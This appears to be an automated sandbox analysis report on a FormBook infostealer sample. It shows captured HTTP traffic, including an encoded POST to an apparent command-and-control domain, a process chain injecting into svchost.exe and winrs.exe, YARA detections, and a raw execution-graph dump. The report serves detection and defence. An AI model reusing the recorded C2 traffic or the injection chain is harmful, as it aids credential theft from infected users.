                                                                      vary: sec-ch-prefers-color-scheme
                                                                      x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_bWcZewp8eISZBr0lUYb166dr3nPAuKFm8lkyMSyz0VztdD3st25mfrrotBOQpEyYQuOCOGrRVeBKclo1TlhzHg==
                                                                      set-cookie: parking_session=cc1d64f8-1624-43ce-907b-f3a3354842fd; expires=Wed, 20 Nov 2024 08:40:33 GMT; path=/
                                                                      connection: close
                                                                      Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 62 57 63 5a 65 77 70 38 65 49 53 5a 42 72 30 6c 55 59 62 31 36 36 64 72 33 6e 50 41 75 4b 46 6d 38 6c 6b 79 4d 53 79 7a 30 56 7a 74 64 44 33 73 74 32 35 6d 66 72 72 6f 74 42 4f 51 70 45 79 59 51 75 4f 43 4f 47 72 52 56 65 42 4b 63 6c 6f 31 54 6c 68 7a 48 67 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                      Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_bWcZewp8eISZBr0lUYb166dr3nPAuKFm8lkyMSyz0VztdD3st25mfrrotBOQpEyYQuOCOGrRVeBKclo1TlhzHg==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                      Nov 20, 2024 09:25:33.612343073 CET607INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                      Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiY2MxZDY0ZjgtMTYyNC00M2NlLTkwN2ItZjNhMzM1NDg0MmZkIiwicGFnZV90aW1lIjoxNzMyMDkxMT


                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                      43192.168.2.1050019199.59.243.22780
                                                                      TimestampBytes transferredDirectionData
                                                                      Nov 20, 2024 09:25:36.940895081 CET1814OUTPOST /pn0u/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Encoding: gzip, deflate
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Host: www.dating-apps-az-dn5.xyz
                                                                      Origin: http://www.dating-apps-az-dn5.xyz
                                                                      Cache-Control: no-cache
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Content-Length: 1229
                                                                      Connection: close
                                                                      Referer: http://www.dating-apps-az-dn5.xyz/pn0u/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
                                                                      Data Raw: 70 72 68 34 3d 75 45 47 55 70 6a 72 30 6f 4d 64 69 59 2b 53 45 4b 4e 2b 33 31 42 34 58 37 33 54 45 64 2b 32 79 6c 46 47 74 7a 6e 57 4c 4c 56 48 54 50 53 43 56 6c 70 2f 66 45 5a 57 2f 77 58 72 32 2f 64 2b 76 75 54 38 4a 32 4d 67 68 56 62 2b 78 55 72 31 58 34 54 35 4a 2f 47 4f 38 61 61 4d 54 56 5a 6a 75 6a 54 50 62 6c 4c 4c 49 53 63 55 48 51 67 64 71 46 4b 5a 6f 43 78 53 39 73 70 36 31 38 4c 43 45 61 6e 62 6d 2f 6a 43 5a 78 68 38 33 69 54 32 37 43 52 31 47 61 4c 33 42 73 65 68 79 50 7a 66 49 6c 32 61 6a 48 59 62 71 57 4f 78 34 45 44 77 44 48 31 54 6f 74 37 36 79 4e 79 66 6f 45 6c 37 4d 46 7a 68 72 56 75 36 65 6b 56 64 61 57 54 67 30 51 34 77 46 69 66 63 4b 7a 2b 31 7a 4f 37 78 72 2f 55 76 68 4b 34 43 6b 76 38 67 5a 6b 52 2b 76 68 48 39 35 6c 5a 6e 61 68 64 44 6c 43 71 59 42 4f 72 75 63 62 34 45 50 33 76 4a 67 2f 69 39 5a 41 50 39 64 54 5a 45 57 58 48 58 77 75 5a 46 7a 65 34 42 57 30 52 45 4d 64 55 56 75 45 6d 44 63 79 75 45 51 72 75 32 6c 76 4b 68 4e 42 66 6b 64 6a 77 6d 63 66 58 77 44 55 4c 44 67 62 [TRUNCATED]
                                                                      Data Ascii: prh4=uEGUpjr0oMdiY+SEKN+31B4X73TEd+2ylFGtznWLLVHTPSCVlp/fEZW/wXr2/d+vuT8J2MghVb+xUr1X4T5J/GO8aaMTVZjujTPblLLIScUHQgdqFKZoCxS9sp618LCEanbm/jCZxh83iT27CR1GaL3BsehyPzfIl2ajHYbqWOx4EDwDH1Tot76yNyfoEl7MFzhrVu6ekVdaWTg0Q4wFifcKz+1zO7xr/UvhK4Ckv8gZkR+vhH95lZnahdDlCqYBOrucb4EP3vJg/i9ZAP9dTZEWXHXwuZFze4BW0REMdUVuEmDcyuEQru2lvKhNBfkdjwmcfXwDULDgbZHi06CLSerpNQKdoZ7vwLRvXdljD3Je8xx4xd95GNjbCm4SIKVr/YjB9UAFigRDNU/+wlTjlvfODBE0EwBgLSQncNvX3ZqHlVRng1Tfq0mlooty8Q4P9bsPV+kLWC+MIh01K7PjEyQmev89XM/8/ggNLGl/8xS1vh2ilwXEaNvdmyzI9zdDd66RCBoHmBU7BPGFp1Oi92xz6KyjwKZbQpyr2zH6czkLE/0fr3Z/tPWUaRHvJSbUJP4a0d9oP2hotCr4xbTS/LHV8QUsRkdXCPaCgjXLBNz39YU/VJ3Q/MkQ9SdmTCQ0S555soHVeecGEZmydca6TwtwrFAVI7ZwpjwexKU30BMpHudlnYt4W2VSmAMsMHmqjGNgHzlWAmwiShF18j30oJ3sMTgVyxuZhRB461Uzy4GUqSEwcg3XAGczEcP5IOYGoFFpkgino+uwFxzZlORJhcYKmgSOh2n/GIRTMQonGPEmIxGFmiuJbw8h9+3c8ifOCHPX+r9l4ZSN7an1cvupihDmqSQusWkIG4s30F8DUYQ0y71PmkRdVEkJGw+zhCq0FsDunMyCFumGaaUuTnHrT0zMMOdg4L6S0a0QMIKQRwDbk90XvE78HIZxUC+y9BxeP958Itxnxl+pumhS7wDQjBxcoyIaBPqI5fIkdkzzKZrPIsx [TRUNCATED]
                                                                      Nov 20, 2024 09:25:37.379458904 CET1236INHTTP/1.1 200 OK
                                                                      date: Wed, 20 Nov 2024 08:25:37 GMT
                                                                      content-type: text/html; charset=utf-8
                                                                      content-length: 1154
                                                                      x-request-id: 95025827-d181-4643-bba4-95ae9fdbddd9
                                                                      cache-control: no-store, max-age=0
                                                                      accept-ch: sec-ch-prefers-color-scheme
                                                                      critical-ch: sec-ch-prefers-color-scheme
                                                                      vary: sec-ch-prefers-color-scheme
                                                                      x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_bWcZewp8eISZBr0lUYb166dr3nPAuKFm8lkyMSyz0VztdD3st25mfrrotBOQpEyYQuOCOGrRVeBKclo1TlhzHg==
                                                                      set-cookie: parking_session=95025827-d181-4643-bba4-95ae9fdbddd9; expires=Wed, 20 Nov 2024 08:40:37 GMT; path=/
                                                                      connection: close
                                                                      Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 62 57 63 5a 65 77 70 38 65 49 53 5a 42 72 30 6c 55 59 62 31 36 36 64 72 33 6e 50 41 75 4b 46 6d 38 6c 6b 79 4d 53 79 7a 30 56 7a 74 64 44 33 73 74 32 35 6d 66 72 72 6f 74 42 4f 51 70 45 79 59 51 75 4f 43 4f 47 72 52 56 65 42 4b 63 6c 6f 31 54 6c 68 7a 48 67 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                      Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_bWcZewp8eISZBr0lUYb166dr3nPAuKFm8lkyMSyz0VztdD3st25mfrrotBOQpEyYQuOCOGrRVeBKclo1TlhzHg==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                      Nov 20, 2024 09:25:37.379492998 CET607INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                      Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiOTUwMjU4MjctZDE4MS00NjQzLWJiYTQtOTVhZTlmZGJkZGQ5IiwicGFnZV90aW1lIjoxNzMyMDkxMT


                                                                      Click to jump to process

                                                                      Click to jump to process

                                                                      Click to dive into process behavior distribution

                                                                      Click to jump to process

                                                                      Target ID:0
                                                                      Start time:03:22:28
                                                                      Start date:20/11/2024
                                                                      Path:C:\Users\user\Desktop\A2028041200SD.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Users\user\Desktop\A2028041200SD.exe"
                                                                      Imagebase:0x8f0000
                                                                      File size:1'214'464 bytes
                                                                      MD5 hash:65A28CDDB97884A94A7C9FAEF74300C3
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:low
                                                                      Has exited:true

                                                                      Target ID:8
                                                                      Start time:03:22:30
                                                                      Start date:20/11/2024
                                                                      Path:C:\Windows\SysWOW64\svchost.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Users\user\Desktop\A2028041200SD.exe"
                                                                      Imagebase:0x100000
                                                                      File size:46'504 bytes
                                                                      MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.1391788061.0000000003250000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.1391861547.0000000005400000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.1390489944.00000000024B0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      Target ID:9
                                                                      Start time:03:22:33
                                                                      Start date:20/11/2024
                                                                      Path:C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exe"
                                                                      Imagebase:0xa80000
                                                                      File size:140'800 bytes
                                                                      MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.3132931690.0000000008020000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.3124924415.0000000004A00000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                      Reputation:high
                                                                      Has exited:false

                                                                      Target ID:10
                                                                      Start time:03:22:35
                                                                      Start date:20/11/2024
                                                                      Path:C:\Windows\SysWOW64\winrs.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Windows\SysWOW64\winrs.exe"
                                                                      Imagebase:0xa60000
                                                                      File size:43'008 bytes
                                                                      MD5 hash:E6C1CE56E6729A0B077C0F2384726B30
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.3124723950.0000000002B90000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.3124795821.0000000002BE0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.3121706684.0000000000640000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                      Reputation:low
                                                                      Has exited:false

                                                                      Target ID:13
                                                                      Start time:03:23:01
                                                                      Start date:20/11/2024
                                                                      Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                      Imagebase:0x7ff613480000
                                                                      File size:676'768 bytes
                                                                      MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      Reset < >

                                                                        Execution Graph

                                                                        Execution Coverage:4.3%
                                                                        Dynamic/Decrypted Code Coverage:0.4%
                                                                        Signature Coverage:7.9%
                                                                        Total number of Nodes:2000
                                                                        Total number of Limit Nodes:68
                                                                        execution_graph 87120 969c06 87131 90d3be 87120->87131 87122 969c1c 87130 969c91 Mailbox 87122->87130 87166 8f1caa 49 API calls 87122->87166 87125 969cc5 87127 96a7ab Mailbox 87125->87127 87168 93cc5c 87 API calls 4 library calls 87125->87168 87128 969c71 87128->87125 87167 93b171 48 API calls 87128->87167 87140 903200 87130->87140 87132 90d3ca 87131->87132 87133 90d3dc 87131->87133 87169 8fdcae 50 API calls Mailbox 87132->87169 87135 90d3e2 87133->87135 87136 90d40b 87133->87136 87170 90f4ea 87135->87170 87179 8fdcae 50 API calls Mailbox 87136->87179 87139 90d3d4 87139->87122 87202 8fbd30 87140->87202 87142 903267 87143 903313 Mailbox ___crtGetEnvironmentStringsW 87142->87143 87275 90c36b 87 API calls 87142->87275 87145 90c3c3 48 API calls 87143->87145 87148 8ffe30 332 API calls 87143->87148 87155 90f4ea 48 API calls 87143->87155 87157 93cc5c 87 API calls 87143->87157 87158 8fdcae 50 API calls 87143->87158 87162 90c2d6 48 API calls 87143->87162 87165 903635 Mailbox 87143->87165 87207 8f2b7a 87143->87207 87214 8fe8d0 87143->87214 87276 8fd9a0 53 API calls __cinit 87143->87276 87277 8fd8c0 53 API calls 87143->87277 87278 8fd645 87143->87278 87288 94f320 332 API calls 87143->87288 87289 94f5ee 332 API calls 87143->87289 87290 8f1caa 49 API calls 87143->87290 87291 94cda2 83 API calls Mailbox 87143->87291 87292 9380e3 53 API calls 87143->87292 87293 8fd764 55 API calls 87143->87293 87294 8fd6e9 87143->87294 87298 93c942 50 API calls 87143->87298 87299 8f6eed 87143->87299 87145->87143 87148->87143 87155->87143 87157->87143 87158->87143 87162->87143 87165->87125 87166->87128 87167->87130 87168->87127 87169->87139 87173 90f4f2 __calloc_impl 87170->87173 87172 90f50c 87172->87139 87173->87172 87174 90f50e std::exception::exception 87173->87174 87180 91395c 87173->87180 87194 916805 RaiseException 87174->87194 87176 90f538 87195 91673b 47 API calls _free 87176->87195 87178 90f54a 87178->87139 87179->87139 87181 9139d7 __calloc_impl 87180->87181 87185 913968 __calloc_impl 87180->87185 87201 917c0e 47 API calls __getptd_noexit 87181->87201 87184 91399b RtlAllocateHeap 87184->87185 87193 9139cf 87184->87193 87185->87184 87187 9139c3 87185->87187 87188 913973 87185->87188 87191 9139c1 87185->87191 87199 917c0e 47 API calls __getptd_noexit 87187->87199 87188->87185 87196 9181c2 47 API calls __NMSG_WRITE 87188->87196 87197 91821f 47 API calls 5 library calls 87188->87197 87198 911145 GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 87188->87198 87200 917c0e 47 API calls __getptd_noexit 87191->87200 87193->87173 87194->87176 87195->87178 87196->87188 87197->87188 87199->87191 87200->87193 87201->87193 87203 8fbd3f 87202->87203 87206 8fbd5a 87202->87206 87303 8fbdfa 87203->87303 87205 8fbd47 CharUpperBuffW 87205->87206 87206->87142 87208 8f2b8b 87207->87208 87209 96436a 87207->87209 87210 90f4ea 48 API calls 87208->87210 87211 8f2b92 87210->87211 87212 8f2bb3 87211->87212 87320 8f2bce 48 API calls 87211->87320 87212->87143 87215 8fe8f6 87214->87215 87273 8fe906 Mailbox 87214->87273 87216 8fed52 87215->87216 87215->87273 87421 90e3cd 332 API calls 87216->87421 87218 8febdd 87218->87143 87220 8fed63 87220->87218 87222 8fed70 87220->87222 87221 8fe94c PeekMessageW 87221->87273 87423 90e312 332 API calls Mailbox 87222->87423 87224 96526e Sleep 87224->87273 87225 8fed77 LockWindowUpdate DestroyWindow GetMessageW 87225->87218 87228 8feda9 87225->87228 87226 8febc7 87226->87218 87422 8f2ff6 16 API calls 87226->87422 87230 9659ef TranslateMessage DispatchMessageW GetMessageW 87228->87230 87230->87230 87231 965a1f 87230->87231 87231->87218 87232 8fed21 PeekMessageW 87232->87273 87233 90f4ea 48 API calls 87233->87273 87234 8febf7 timeGetTime 87234->87273 87236 8f6eed 48 API calls 87236->87273 87237 8fed3a TranslateMessage DispatchMessageW 87237->87232 87238 965557 WaitForSingleObject 87241 965574 GetExitCodeProcess CloseHandle 87238->87241 87238->87273 87240 96588f Sleep 87265 965429 Mailbox 87240->87265 87241->87273 87242 8fedae timeGetTime 87424 8f1caa 49 API calls 87242->87424 87244 965733 Sleep 87244->87265 87245 90dc38 timeGetTime 87245->87265 87249 965926 GetExitCodeProcess 87251 965952 CloseHandle 87249->87251 87252 96593c WaitForSingleObject 87249->87252 87250 965445 Sleep 87250->87273 87251->87265 87252->87251 87252->87273 87253 965432 Sleep 87253->87250 87254 958c4b 109 API calls 87254->87265 87255 8f2c79 108 API calls 87255->87265 87257 9659ae Sleep 87257->87273 87258 8f1caa 49 API calls 87258->87273 87264 8fd6e9 55 API calls 87264->87265 87265->87245 87265->87249 87265->87250 87265->87253 87265->87254 87265->87255 87265->87257 87265->87264 87265->87273 87426 8fd7f7 87265->87426 87431 934cbe 49 API calls Mailbox 87265->87431 87432 8f1caa 49 API calls 87265->87432 87433 8fce19 87265->87433 87439 8f2aae 332 API calls 87265->87439 87469 94ccb2 50 API calls 87265->87469 87470 937a58 QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 87265->87470 87471 936532 63 API calls 3 library calls 87265->87471 87268 903200 308 API calls 87268->87273 87270 8fd6e9 55 API calls 87270->87273 87271 93cc5c 87 API calls 87271->87273 87272 8fce19 48 API calls 87272->87273 87273->87221 87273->87224 87273->87226 87273->87232 87273->87233 87273->87234 87273->87236 87273->87237 87273->87238 87273->87240 87273->87242 87273->87244 87273->87250 87273->87258 87273->87265 87273->87268 87273->87270 87273->87271 87273->87272 87274 8f2aae 308 API calls 87273->87274 87321 8fef00 87273->87321 87328 8ff110 87273->87328 87393 9045e0 87273->87393 87410 90e244 87273->87410 87415 90dc5f 87273->87415 87420 8feed0 332 API calls Mailbox 87273->87420 87425 958d23 48 API calls 87273->87425 87440 8ffe30 87273->87440 87274->87273 87275->87143 87276->87143 87277->87143 87279 8fd654 87278->87279 87286 8fd67e 87278->87286 87280 8fd65b 87279->87280 87283 8fd6c2 87279->87283 87281 8fd666 87280->87281 87287 8fd6ab 87280->87287 88426 8fd9a0 53 API calls __cinit 87281->88426 87283->87287 88428 90dce0 53 API calls 87283->88428 87286->87143 87287->87286 88427 90dce0 53 API calls 87287->88427 87288->87143 87289->87143 87290->87143 87291->87143 87292->87143 87293->87143 87295 8fd6f4 87294->87295 87296 8fd71b 87295->87296 88429 8fd764 55 API calls 87295->88429 87296->87143 87298->87143 87300 8f6ef8 87299->87300 87301 8f6f00 87299->87301 88430 8fdd47 48 API calls ___crtGetEnvironmentStringsW 87300->88430 87301->87143 87304 8fbe0d 87303->87304 87305 8fbe0a ___crtGetEnvironmentStringsW 87303->87305 87306 90f4ea 48 API calls 87304->87306 87305->87205 87307 8fbe17 87306->87307 87309 90ee75 87307->87309 87311 90f4ea __calloc_impl 87309->87311 87310 91395c std::exception::_Copy_str 47 API calls 87310->87311 87311->87310 87312 90f50c 87311->87312 87313 90f50e std::exception::exception 87311->87313 87312->87305 87318 916805 RaiseException 87313->87318 87315 90f538 87319 91673b 47 API calls _free 87315->87319 87317 90f54a 87317->87305 87318->87315 87319->87317 87320->87212 87322 8fef2f 87321->87322 87323 8fef1d 87321->87323 87473 93cc5c 87 API calls 4 library calls 87322->87473 87472 8fe3b0 332 API calls 2 library calls 87323->87472 87326 8fef26 87326->87273 87327 9686f9 87327->87327 87329 8ff130 87328->87329 87332 8ffe30 332 API calls 87329->87332 87336 8ff199 87329->87336 87330 8ff3dd 87333 9687c8 87330->87333 87341 8ff3f2 87330->87341 87378 8ff431 Mailbox 87330->87378 87331 8ff595 87338 8fd7f7 48 API calls 87331->87338 87331->87378 87334 968728 87332->87334 87494 93cc5c 87 API calls 4 library calls 87333->87494 87334->87336 87491 93cc5c 87 API calls 4 library calls 87334->87491 87336->87330 87336->87331 87339 8fd7f7 48 API calls 87336->87339 87374 8ff229 87336->87374 87340 9687a3 87338->87340 87343 968772 87339->87343 87493 910f0a 52 API calls __cinit 87340->87493 87369 8ff418 87341->87369 87495 939af1 48 API calls 87341->87495 87342 968b1b 87358 968bcf 87342->87358 87359 968b2c 87342->87359 87492 910f0a 52 API calls __cinit 87343->87492 87346 8ff770 87353 968a45 87346->87353 87370 8ff77a 87346->87370 87348 8fd6e9 55 API calls 87348->87378 87349 968c53 87509 93cc5c 87 API calls 4 library calls 87349->87509 87350 968810 87496 94eef8 332 API calls 87350->87496 87351 8ffe30 332 API calls 87372 8ff6aa 87351->87372 87352 93cc5c 87 API calls 87352->87378 87501 90c1af 48 API calls 87353->87501 87354 968b7e 87504 94e40a 332 API calls Mailbox 87354->87504 87506 93cc5c 87 API calls 4 library calls 87358->87506 87503 94f5ee 332 API calls 87359->87503 87360 968beb 87507 94bdbd 332 API calls Mailbox 87360->87507 87362 8ffe30 332 API calls 87362->87378 87364 901b90 48 API calls 87364->87378 87369->87342 87369->87372 87369->87378 87474 901b90 87370->87474 87371 968c00 87392 8ff537 Mailbox 87371->87392 87508 93cc5c 87 API calls 4 library calls 87371->87508 87372->87346 87372->87351 87375 8ffce0 87372->87375 87372->87378 87372->87392 87373 968823 87373->87369 87377 96884b 87373->87377 87374->87330 87374->87331 87374->87369 87374->87378 87375->87392 87505 93cc5c 87 API calls 4 library calls 87375->87505 87497 94ccdc 48 API calls 87377->87497 87378->87348 87378->87349 87378->87352 87378->87354 87378->87360 87378->87362 87378->87364 87378->87375 87378->87392 87490 8fdd47 48 API calls ___crtGetEnvironmentStringsW 87378->87490 87502 9297ed InterlockedDecrement 87378->87502 87510 90c1af 48 API calls 87378->87510 87382 968857 87384 968865 87382->87384 87385 9688aa 87382->87385 87498 939b72 48 API calls 87384->87498 87388 9688a0 Mailbox 87385->87388 87499 93a69d 48 API calls 87385->87499 87386 8ffe30 332 API calls 87386->87392 87388->87386 87390 9688e7 87500 8fbc74 48 API calls 87390->87500 87392->87273 87394 904637 87393->87394 87395 90479f 87393->87395 87396 966e05 87394->87396 87397 904643 87394->87397 87398 8fce19 48 API calls 87395->87398 87573 94e822 87396->87573 87572 904300 332 API calls ___crtGetEnvironmentStringsW 87397->87572 87405 9046e4 Mailbox 87398->87405 87401 966e11 87402 904739 Mailbox 87401->87402 87613 93cc5c 87 API calls 4 library calls 87401->87613 87402->87273 87404 904659 87404->87401 87404->87402 87404->87405 87513 93fa0c 87405->87513 87554 8f4252 87405->87554 87560 946ff0 87405->87560 87569 936524 87405->87569 87411 90e253 87410->87411 87412 96df42 87410->87412 87411->87273 87413 96df77 87412->87413 87414 96df59 TranslateAcceleratorW 87412->87414 87414->87411 87416 90dca3 87415->87416 87417 90dc71 87415->87417 87416->87273 87417->87416 87418 90dc96 IsDialogMessageW 87417->87418 87419 96dd1d GetClassLongW 87417->87419 87418->87416 87418->87417 87419->87417 87419->87418 87420->87273 87421->87226 87422->87220 87423->87225 87424->87273 87425->87273 87427 90f4ea 48 API calls 87426->87427 87428 8fd818 87427->87428 87429 90f4ea 48 API calls 87428->87429 87430 8fd826 87429->87430 87430->87265 87431->87265 87432->87265 87434 8fce28 __NMSG_WRITE 87433->87434 87435 90ee75 48 API calls 87434->87435 87436 8fce50 ___crtGetEnvironmentStringsW 87435->87436 87437 90f4ea 48 API calls 87436->87437 87438 8fce66 87437->87438 87438->87265 87439->87265 87441 8ffe50 87440->87441 87468 8ffe7e 87440->87468 87442 90f4ea 48 API calls 87441->87442 87442->87468 87443 910f0a 52 API calls __cinit 87443->87468 87444 90146e 87445 8f6eed 48 API calls 87444->87445 87467 8fffe1 87445->87467 87446 9297ed InterlockedDecrement 87446->87468 87447 90f4ea 48 API calls 87447->87468 87448 900509 88424 93cc5c 87 API calls 4 library calls 87448->88424 87451 8f6eed 48 API calls 87451->87468 87453 901473 88423 93cc5c 87 API calls 4 library calls 87453->88423 87454 96a246 87456 8f6eed 48 API calls 87454->87456 87455 96a922 87455->87273 87456->87467 87459 8fd7f7 48 API calls 87459->87468 87460 96a873 87460->87273 87461 96a30e 87461->87467 88421 9297ed InterlockedDecrement 87461->88421 87463 96a973 88425 93cc5c 87 API calls 4 library calls 87463->88425 87465 9015b5 88422 93cc5c 87 API calls 4 library calls 87465->88422 87466 96a982 87467->87273 87468->87443 87468->87444 87468->87446 87468->87447 87468->87448 87468->87451 87468->87453 87468->87454 87468->87459 87468->87461 87468->87463 87468->87465 87468->87467 88419 901820 332 API calls 2 library calls 87468->88419 